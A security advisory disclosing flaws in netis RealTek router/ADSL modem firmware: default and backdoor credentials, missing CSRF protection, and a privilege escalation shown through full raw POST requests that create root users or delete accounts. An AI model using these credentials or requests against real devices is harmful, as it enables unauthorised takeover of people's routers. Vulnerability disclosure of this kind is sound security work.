netis RealTek wireless router / ADSL modem Multiple Vulnerab

1. # Exploit Title: [netis RealTek wireless router / ADSL modem Multiple
2. Vulnerabilities]
3. # Discovered by: Karn Ganeshen
4. # Reported on: [October 13, 2015]
5. # Vendor Response: [Vulnerability? What's this?]
6. # Vendor Homepage: [www.netis-systems.com]
7. # Version Affected: [Firmware version RTK v2.1.1]
8.  
9.  
10. **Vulnerability Details**
11.  
12. * 1. Default, weak passwords for http and ftp services *
13.  
14. a. *HTTP accounts*
15. - guest/guest
16. - user/user
17. - guest/XXXXairocon
18.  
19. <chain N="USERNAME_PASSWORD">
20. <V N="FLAG" V="0x0"/>
21. <V N="USERNAME" V="guest"/>
22. <V N="PASSWORD" V="guest"/>
23. <V N="BACKDOOR" V="0x0"/>
24. <V N="PRIORITY" V="0x2"/>
25. </chain>
26. <chain N="USERNAME_PASSWORD">
27. <V N="FLAG" V="0x0"/>
28. <V N="USERNAME" V="user"/>
29. <V N="PASSWORD" V="user"/>
30. <V N="BACKDOOR" V="0x0"/>
31. <V N="PRIORITY" V="0x0"/> </chain>
32.  
33. <chain N="USERNAME_PASSWORD">
34. <V N="FLAG" V="0x0"/>
35. <V N="USERNAME" V="guest"/>
36. <V N="PASSWORD" V="XXXXairocon"/>
37. <V N="BACKDOOR" V="0x1"/>
38. <V N="PRIORITY" V="0x1"/> </chain>
39.  
40. *XXXX -> last four digits of MAC address *
41.  
42. b. *FTP accounts*
43.  
44. - admin/admin
45. - useradmin/useradmin
46. - user/user
47.  
48. <chain N="FTP_SERVER">
49. <V N="ENABLE" V="0x1"/>
50. <V N="USERNAME" V="admin"/>
51. <V N="PASSWORD" V="admin"/>
52. <V N="PORT" V="0x15"/>
53. <V N="USERRIGHT" V="0x3"/>
54. <V N="INSTNUM" V="0x1"/> </chain>
55.  
56. <chain N="FTP_SERVER">
57. <V N="ENABLE" V="0x1"/>
58. <V N="USERNAME" V="useradmin"/>
59. <V N="PASSWORD" V="useradmin"/>
60. <V N="PORT" V="0x15"/>
61. <V N="USERRIGHT" V="0x2"/>
62. <V N="INSTNUM" V="0x2"/> </chain>
63.  
64. <chain N="FTP_SERVER">
65. <V N="ENABLE" V="0x1"/>
66. <V N="USERNAME" V="user"/>
67. <V N="PASSWORD" V="user"/>
68. <V N="PORT" V="0x15"/>
69. <V N="USERRIGHT" V="0x1"/>
70. <V N="INSTNUM" V="0x3"/> </chain>
71.  
72.  
73. 2. *Backdoor accounts*
74. The device comes configured with privileged, backdoor account.
75.  
76. For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
77. account. This is seen in the config file:
78.  
79. <chain N="USERNAME_PASSWORD">
80. <V N="FLAG" V="0x0"/>
81. <V N="USERNAME" V="guest"/>
82. <V N="PASSWORD" V="XXXXairocon"/>
83. <V N="BACKDOOR" V="0x1"/>
84. <V N="PRIORITY" V="0x1"/>
85. </chain>
86.  
87. This user is not shown / visible in the user list when logged in as guest
88. (privileged user).
89.  
90.  
91. 3. *No CSRF protection*
92. There is no CSRF token set in any of the forms / pages.
93.  
94. It is possible to silently execute HTTP requests if the user is logged in.
95.  
96.  
97. 4. *Weak RBAC controls *
98.  
99. 5a) *A non-root/non-admin user (user) can create and delete any other
100. users, including root-privileged accounts. *
101.  
102. In netis RealTek wireless router ADSL modem, there are three users:
103.  
104. guest:guest -> priv 2 is super user account with full functional access
105. user:user -> priv 0 -> can access only some functions
106. guest:XXXXairocon -> privileged backdoor login
107.  
108.  
109. *Normally: *
110.  
111. - user can create new account with restricted user privs only.
112. - user can change its password and only other non-root users.
113. - user can delete any other non-root users.
114.  
115. However, the application does not enforce strict rbac and it is possible
116. for a non-root user to create a new user with root privileges.
117.  
118.  
119. This is done as follows:
120.  
121. 1. Start creating a new user, and intercepting the user creation POST
122. request
123. 2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) -
124. Submit request
125. 3. When the new root user is created successfully, it does not show up in
126. user list
127. 4. Confirm via logging in as new root, and / or configured accounts in
128. configuration file (config.img)
129.  
130.  
131. This is the POST request to create a new user:
132.  
133. *Create user http request*:
134.  
135. POST /form2userconfig.cgi HTTP/1.1
136. Host: <IP>
137. User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
138. Firefox/38.0
139. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
140. Accept-Language: en-US,en;q=0.5
141. Accept-Encoding: gzip, deflate
142. DNT: 1
143. Referer: http://<IP>/userconfig.htm?v=
144. Cookie: SessionID=
145. Connection: keep-alive
146. Content-Type: application/x-www-form-urlencoded
147. Content-Length: 115
148. username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=
149.  
150.  
151.  
152. *Note1*: In some cases, this password change function is not accessible to
153. 'user' via GUI. But we can still send a POST request to create a valid, new
154. root privileged account.
155.  
156. *Note2*: In some cases, application does not create root priv user, in the
157. first attempt. However, in the 2nd or 3rd attempt, new user is created
158. without any issue.
159.  
160.  
161. *Delete user http request:*
162. A non-root/non-admin user can delete any configured user(s) including
163. privileged users (guest).
164.  
165. POST /form2userconfig.cgi HTTP/1.1
166. Host: <ip>
167. User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
168. Firefox/38.0
169. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
170. Accept-Language: en-US,en;q=0.5
171. Accept-Encoding: gzip, deflate
172. DNT: 1
173. Referer: http://<IP>/userconfig.htm
174. Cookie: SessionID=
175. Connection: keep-alive
176. Content-Type: application/x-www-form-urlencoded
177. Content-Length: 131
178. username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%
179.  
180.  
181.  
182. In case (non-root) user is deleting a root login (guest, priv 2), action
183. status can be confirmed by checking the configuration In case (non-root)
184. user is deleting a user login (priv 0), action status can be confirmed by
185. checking the user list.
186.  
187.  
188. 5b) *(non-root priv) User can access unauthorized functions.*
189. Normally, 'user' does not have access to all the functionality of the
190. device. It has access to Status, Setup and Maintenance.
191.  
192. However, few functions can still be accessed by calling them directly. For
193. example, to access the mac filtering configuration this url can be opened
194. directly:
195.  
196. http://<IP>/fw-macfilter.htm
197.  
198. Other functions may also be accessible in this manner.
199.  
200.  
201. 6. *Sensitive information not secured from low privileged users *
202.  
203. A non-root / non-admin privileged user has access to download the
204. configuration file - config.img.
205.  
206. This file contains clear-text passwords, keys and other sensitive
207. information which can be used to gain privileged access.
208.  
209.  
210. 7. *Sensitive information accessible in clear-text*
211.  
212. Sensitive Information like passwords and keys are not secured properly.
213. Mostly these are either shown in clear-text or cen censored *****, it is
214. possible to view clear-text values by 'Inspect Element' locally or
215. intercepting http requests, or sniffing.